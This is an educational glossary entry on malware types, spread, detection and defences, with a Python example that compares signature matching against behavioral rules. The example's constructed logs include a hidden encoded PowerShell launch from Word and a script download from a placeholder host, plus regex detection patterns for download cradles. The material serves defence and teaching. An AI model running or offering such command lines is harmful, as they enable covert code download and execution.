Malware
A general term for any type of software developed with the intent to cause damage, steal data, or compromise systems—from viruses and Trojans to ransomware.
Malware (short for "malicious software") is the umbrella term for all types of malicious software that have been intentionally developed to damage systems, steal data, take control, or cause other harm.
Major Types of Malware
Virus: Infects legitimate files and spreads itself when executed. A classic type, less common today than in the past—antivirus software has largely contained this type.
Trojan (Trojan Horse): Disguises itself as useful software. Opens backdoors or steals data. The most common means of distribution for other malware—e.g., via fake invoice PDFs.
Ransomware: Encrypts data and demands a ransom. Remains the biggest threat to businesses in 2024—average ransom demand: $2.73 million (Coveware).
Spyware: Secretly monitors activities—keyloggers, screenshot capture, camera access. Used for industrial espionage and government surveillance (e.g., Pegasus).
Rootkit: Hides itself and other malware deep within the system (kernel level or bootloader). Very difficult to detect and remove—often requires a clean install.
Worm: Spreads autonomously across networks without a host program. Classic examples: WannaCry (2017, >200,000 systems in 150 countries), NotPetya (2017, $10 billion in damages).
Backdoor: Secret access that bypasses normal authentication. Often set up by other types of malware—or installed directly by APT groups for long-term access.
Fileless Malware: Exists only in RAM, with no files written to the hard drive—particularly difficult to detect, as traditional antivirus software has nothing to scan. Typically abuses built-in tools such as PowerShell, WMI, and other LOLBins (living-off-the-land binaries).
Stealer (Info Stealer): Targets credentials, cookies, and crypto wallets. Known families: RedLine Stealer, Raccoon, Vidar, LummaC2. The data ends up as "stealer logs" on the dark web.
Adware/Scareware: Less harmful—annoying with ads or fake virus alerts designed to extort money ("Your PC is infected! Call: +1-800...").
Distribution
Most common distribution methods:
- Phishing emails (91% of all malware infections start here) – macro-enabled Office documents, malicious attachments
- Drive-by downloads – compromised websites automatically infect visitors via browser exploits
- Infected USB drives – 60% of people plug in found USB drives (IBM study)
- Software downloads from unofficial sources – cracked software, tools on dubious sites
- Supply chain attacks – legitimate software updates contain malware (SolarWinds 2020)
- Exploits against unpatched systems – known CVEs in VPNs, Exchange, and web servers
Detection Methods
- Signature-based: Comparison with known malware signatures – fast, but does not detect zero-days or new variants
- Heuristic: Behavioral analysis of suspicious actions – slower, but detects new variants
- Sandboxing: Execution in an isolated environment for behavioral analysis before delivery to users
- EDR (Endpoint Detection & Response): Continuous monitoring of all processes, registry changes, and network connections – also detects fileless malware and LOLBin abuse
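The difference between signature-based and behavioral detection described above is easiest to see side by side. The following Python example is added here and is not code from the original page or from any product it mentions: it looks up a file hash in a one-entry signature database (which misses a trivially modified variant) and then runs a few behavioral rules of the kind an EDR applies, such as an Office application spawning a script host or an encoded PowerShell command line, over constructed process-creation log lines. The log format, the rule names, and the sample values are all assumptions made for the example.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# --- Signature-based detection: exact hash lookup ---------------------------
# Constructed sample bytes standing in for a known-bad file; the family name is made up.
KNOWN_BAD_SAMPLE = b"constructed-malicious-payload-v1"
SIGNATURE_DB = {hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest(): "Example.Stealer.A"}
# A "new variant": the same payload with one byte changed, so the hash no longer matches.
VARIANT_SAMPLE = KNOWN_BAD_SAMPLE.replace(b"v1", b"v2")


def signature_scan(data: bytes) -> Optional[str]:
    """Return the family name if the exact SHA-256 is in the database, else None."""
    return SIGNATURE_DB.get(hashlib.sha256(data).hexdigest())


# --- Behavioral (heuristic) detection over process telemetry -----------------
@dataclass
class ProcessEvent:
    parent: str    # parent image name, lower-cased
    image: str     # child image name, lower-cased
    cmdline: str   # full command line as logged


# Constructed log format (assumption): parent=<image> image=<image> cmdline="<command line>"
LINE_RE = re.compile(r'parent=(\S+)\s+image=(\S+)\s+cmdline="(.*)"$')

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -encodedcommand followed by a base64-looking blob
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
# Common download-cradle cmdlets and .NET calls seen in script-based droppers
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient",
                             re.IGNORECASE)


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Parse one constructed log line; return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parent, image, cmdline = m.groups()
    return ProcessEvent(parent.lower(), image.lower(), cmdline)


def behavioral_findings(event: ProcessEvent) -> List[str]:
    """Apply the behavioral rules to one event and return the names of those that fired."""
    findings = []
    if event.parent in OFFICE_APPS and event.image in SCRIPT_HOSTS:
        findings.append("office_app_spawned_script_host")
    if event.image in POWERSHELL and ENCODED_FLAG.search(event.cmdline):
        findings.append("encoded_powershell_command")
    if event.image in POWERSHELL and DOWNLOAD_CRADLE.search(event.cmdline):
        findings.append("powershell_download_cradle")
    return findings


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based line number -> findings, for every line that triggered at least one rule."""
    results: Dict[int, List[str]] = {}
    for number, line in enumerate(lines, 1):
        event = parse_event(line)
        if event is None:
            continue
        findings = behavioral_findings(event)
        if findings:
            results[number] = findings
    return results


# Constructed telemetry: one benign document open, one macro-style chain, one admin
# command, one Office-to-cmd spawn, and one download cradle (host name is reserved/invalid).
SAMPLE_LOG = [
    r'parent=explorer.exe image=winword.exe cmdline="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /n invoice.docm"',
    'parent=winword.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="',
    r'parent=explorer.exe image=powershell.exe cmdline="powershell.exe Get-ChildItem C:\Users"',
    'parent=excel.exe image=cmd.exe cmdline="cmd.exe /c echo macro-test"',
    'parent=svchost.exe image=powershell.exe cmdline="powershell.exe -c Invoke-WebRequest http://example.invalid/update.ps1"',
]

if __name__ == "__main__":
    print("known sample :", signature_scan(KNOWN_BAD_SAMPLE))   # Example.Stealer.A
    print("variant      :", signature_scan(VARIANT_SAMPLE))     # None: signature misses it
    for number, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(findings)}")
```

The hash lookup is exact and fast but is defeated by a single changed byte, which is why signatures miss new variants; the behavioral rules know nothing about the file at all and fire on what the process does, so the same telemetry flags the macro-to-PowerShell chain on line 2 regardless of which binary produced it. The benign document open (line 1) and the interactive directory listing (line 3) trigger nothing, which is the trade-off a real rule set has to keep: broad enough to catch LOLBin abuse, narrow enough not to page on ordinary administration.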
Protective Measures
Technical:
- EDR on all endpoints (not just traditional antivirus)
- Email gateway with attachment sandboxing
- Disable macros in Office (GPO) or allow them only for signed documents
- Disable USB ports or enable them only for approved devices
- Regular patching (attackers often exploit vulnerabilities that have been known for weeks)
Organizational:
- Security awareness training – employees are the most common point of entry
- Least privilege principle: malware can only use the privileges of the infected account
- Network segmentation: limits the spread of worms and ransomware